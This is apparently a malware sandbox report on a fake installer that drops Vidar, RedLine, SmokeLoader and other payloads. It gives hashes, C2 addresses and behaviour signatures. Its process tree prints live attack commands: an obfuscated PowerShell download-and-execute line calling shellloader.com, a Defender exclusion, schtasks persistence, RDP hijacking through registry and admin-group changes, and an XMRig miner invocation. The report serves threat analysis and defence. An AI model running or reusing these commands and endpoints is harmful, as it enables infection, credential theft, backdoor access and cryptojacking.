Resubmissions

12-09-2021 18:05

210912-wpjm6afecr 10

12-09-2021 07:11

210912-h1abzacbb7 10

Analysis

  • max time kernel
    1800s
  • max time network
    1807s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    12-09-2021 18:05

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.5MB

  • MD5

    1b5154bc65145adba0a58e964265d5f2

  • SHA1

    5a96fd55be61222b3e6438712979dc2a18a50b8c

  • SHA256

    c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19

  • SHA512

    9465da97b0986fef660e3f7725b4d4c034bef677acbe36382d95a8052c54634f004162aa3f105156e503af1b26632e47e44234ef9825b388260a6bcd310a5026

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://shellloader.com/welcome

Extracted

Family

vidar

Version

40.5

Botnet

706

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

pab123

C2

45.14.49.169:22411

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

129c4t2

C2

185.215.113.104:18754

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

    suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity

  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

  • suricata: ET MALWARE Win32/Tnega Activity (GET)

    suricata: ET MALWARE Win32/Tnega Activity (GET)

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 49 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 63 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 51 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 48 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 15 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 23 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs net.exe
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    • Suspicious use of SetThreadContext
    PID:2740
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:1104
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    PID:3052
    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:636
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1004
        • C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\setup_install.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1252
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2540
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:732
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2560
            • C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05ac1b0207d3ff3b8.exe
              Sun05ac1b0207d3ff3b8.exe
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Modifies system certificate store
              PID:1912
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im Sun05ac1b0207d3ff3b8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05ac1b0207d3ff3b8.exe" & del C:\ProgramData\*.dll & exit
                7⤵
                  PID:5608
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im Sun05ac1b0207d3ff3b8.exe /f
                    8⤵
                    • Kills process with taskkill
                    PID:5864
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    8⤵
                    • Delays execution with timeout.exe
                    PID:4168
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2708
              • C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun052bbd8bebd9.exe
                Sun052bbd8bebd9.exe
                6⤵
                • Executes dropped EXE
                PID:4092
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun05532f7abc.exe
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2732
              • C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05532f7abc.exe
                Sun05532f7abc.exe
                6⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:688
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3060
              • C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05640630a6aa.exe
                Sun05640630a6aa.exe
                6⤵
                • Executes dropped EXE
                PID:3032
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3764
              • C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun059375dac544fc4a.exe
                Sun059375dac544fc4a.exe
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:3168
                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:3588
                  • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2672
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                      9⤵
                        PID:1536
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                          10⤵
                          • Creates scheduled task(s)
                          PID:2160
                      • C:\Users\Admin\AppData\Roaming\services64.exe
                        "C:\Users\Admin\AppData\Roaming\services64.exe"
                        9⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:5868
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                          10⤵
                            PID:7024
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                              11⤵
                              • Creates scheduled task(s)
                              PID:5092
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:6068
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                            10⤵
                              PID:4552
                        • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                          "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3760
                          • C:\ProgramData\7844654.exe
                            "C:\ProgramData\7844654.exe"
                            9⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4752
                          • C:\ProgramData\4438404.exe
                            "C:\ProgramData\4438404.exe"
                            9⤵
                            • Executes dropped EXE
                            • Suspicious behavior: SetClipboardViewer
                            PID:1044
                          • C:\ProgramData\1090232.exe
                            "C:\ProgramData\1090232.exe"
                            9⤵
                              PID:5116
                              • C:\ProgramData\1090232.exe
                                "C:\ProgramData\1090232.exe"
                                10⤵
                                • Executes dropped EXE
                                PID:4400
                            • C:\ProgramData\2177366.exe
                              "C:\ProgramData\2177366.exe"
                              9⤵
                              • Executes dropped EXE
                              PID:2232
                          • C:\Users\Admin\AppData\Local\Temp\2.exe
                            "C:\Users\Admin\AppData\Local\Temp\2.exe"
                            8⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4100
                            • C:\Windows\system32\WerFault.exe
                              C:\Windows\system32\WerFault.exe -u -p 4100 -s 1532
                              9⤵
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4888
                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                            8⤵
                            • Executes dropped EXE
                            PID:4160
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 804
                              9⤵
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4176
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 816
                              9⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:768
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 868
                              9⤵
                              • Program crash
                              PID:1328
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 896
                              9⤵
                              • Program crash
                              PID:4608
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 956
                              9⤵
                              • Program crash
                              PID:3952
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 1080
                              9⤵
                              • Program crash
                              PID:4040
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 956
                              9⤵
                              • Suspicious use of NtCreateProcessExOtherParentProcess
                              • Program crash
                              PID:4256
                          • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                            "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                            8⤵
                            • Executes dropped EXE
                            PID:4288
                          • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                            8⤵
                            • Executes dropped EXE
                            PID:4484
                            • C:\Users\Admin\AppData\Local\Temp\is-HG7VD.tmp\setup_2.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-HG7VD.tmp\setup_2.tmp" /SL5="$201F2,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                              9⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:4628
                              • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                10⤵
                                • Executes dropped EXE
                                PID:2388
                                • C:\Users\Admin\AppData\Local\Temp\is-89D6Q.tmp\setup_2.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-89D6Q.tmp\setup_2.tmp" /SL5="$4020A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                  11⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Drops file in Program Files directory
                                  • Suspicious use of FindShellTrayWindow
                                  PID:4772
                                  • C:\Users\Admin\AppData\Local\Temp\is-KA6Q0.tmp\postback.exe
                                    "C:\Users\Admin\AppData\Local\Temp\is-KA6Q0.tmp\postback.exe" ss1
                                    12⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:5952
                                    • C:\Windows\SysWOW64\explorer.exe
                                      explorer.exe ss1
                                      13⤵
                                        PID:5316
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                          14⤵
                                            PID:3640
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                              15⤵
                                              • Blocklisted process makes network request
                                              PID:5264
                                          • C:\Users\Admin\AppData\Local\Temp\ItWOC2Kah.exe
                                            "C:\Users\Admin\AppData\Local\Temp\ItWOC2Kah.exe"
                                            14⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks processor information in registry
                                            PID:4932
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c taskkill /im ItWOC2Kah.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ItWOC2Kah.exe" & del C:\ProgramData\*.dll & exit
                                              15⤵
                                                PID:6984
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /im ItWOC2Kah.exe /f
                                                  16⤵
                                                  • Kills process with taskkill
                                                  PID:5212
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 6
                                                  16⤵
                                                  • Delays execution with timeout.exe
                                                  PID:6564
                                            • C:\Users\Admin\AppData\Local\Temp\aMBdCWawc.exe
                                              "C:\Users\Admin\AppData\Local\Temp\aMBdCWawc.exe"
                                              14⤵
                                              • Executes dropped EXE
                                              PID:3980
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                                15⤵
                                                • Drops file in Windows directory
                                                PID:6992
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k1hphrfg\k1hphrfg.cmdline"
                                                  16⤵
                                                    PID:4660
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES275A.tmp" "c:\Users\Admin\AppData\Local\Temp\k1hphrfg\CSC3BB0E230F04042EABAA5CE1D8C5CB15D.TMP"
                                                      17⤵
                                                        PID:4372
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                      16⤵
                                                        PID:2496
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                        16⤵
                                                          PID:3156
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            17⤵
                                                            • Loads dropped DLL
                                                            PID:5780
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                          16⤵
                                                            PID:3580
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                            16⤵
                                                              PID:4400
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                              16⤵
                                                              • Modifies registry key
                                                              PID:4004
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                              16⤵
                                                                PID:6100
                                                              • C:\Windows\SysWOW64\net.exe
                                                                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                16⤵
                                                                  PID:4288
                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                    17⤵
                                                                      PID:5688
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                                    16⤵
                                                                      PID:5052
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c net start rdpdr
                                                                        17⤵
                                                                          PID:6324
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            net start rdpdr
                                                                            18⤵
                                                                              PID:6832
                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                C:\Windows\system32\net1 start rdpdr
                                                                                19⤵
                                                                                  PID:4456
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                            16⤵
                                                                              PID:1844
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c net start TermService
                                                                                17⤵
                                                                                  PID:5552
                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                    net start TermService
                                                                                    18⤵
                                                                                      PID:6364
                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                        C:\Windows\system32\net1 start TermService
                                                                                        19⤵
                                                                                          PID:3992
                                                                              • C:\Users\Admin\AppData\Local\Temp\TgwME65w9.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\TgwME65w9.exe"
                                                                                14⤵
                                                                                • Executes dropped EXE
                                                                                PID:6996
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                                                                  15⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Drops file in Windows directory
                                                                                  PID:5580
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5grdt0iv\5grdt0iv.cmdline"
                                                                                    16⤵
                                                                                      PID:6724
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA247.tmp" "c:\Users\Admin\AppData\Local\Temp\5grdt0iv\CSCDA0F05323C40450EBC3F04B67F7718.TMP"
                                                                                        17⤵
                                                                                          PID:6648
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                        16⤵
                                                                                          PID:5492
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                          16⤵
                                                                                            PID:6536
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                            16⤵
                                                                                              PID:7124
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                                                              16⤵
                                                                                                PID:2496
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                                                                16⤵
                                                                                                • Modifies registry key
                                                                                                PID:2004
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                                                                16⤵
                                                                                                  PID:6848
                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                  "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                  16⤵
                                                                                                    PID:5876
                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                      17⤵
                                                                                                        PID:304
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                                                                      16⤵
                                                                                                        PID:2328
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c net start rdpdr
                                                                                                          17⤵
                                                                                                            PID:5212
                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                              net start rdpdr
                                                                                                              18⤵
                                                                                                                PID:6824
                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                  C:\Windows\system32\net1 start rdpdr
                                                                                                                  19⤵
                                                                                                                    PID:5684
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                                                              16⤵
                                                                                                                PID:4864
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c net start TermService
                                                                                                                  17⤵
                                                                                                                    PID:6168
                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                      net start TermService
                                                                                                                      18⤵
                                                                                                                        PID:6024
                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                          C:\Windows\system32\net1 start TermService
                                                                                                                          19⤵
                                                                                                                            PID:4996
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4960
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4636
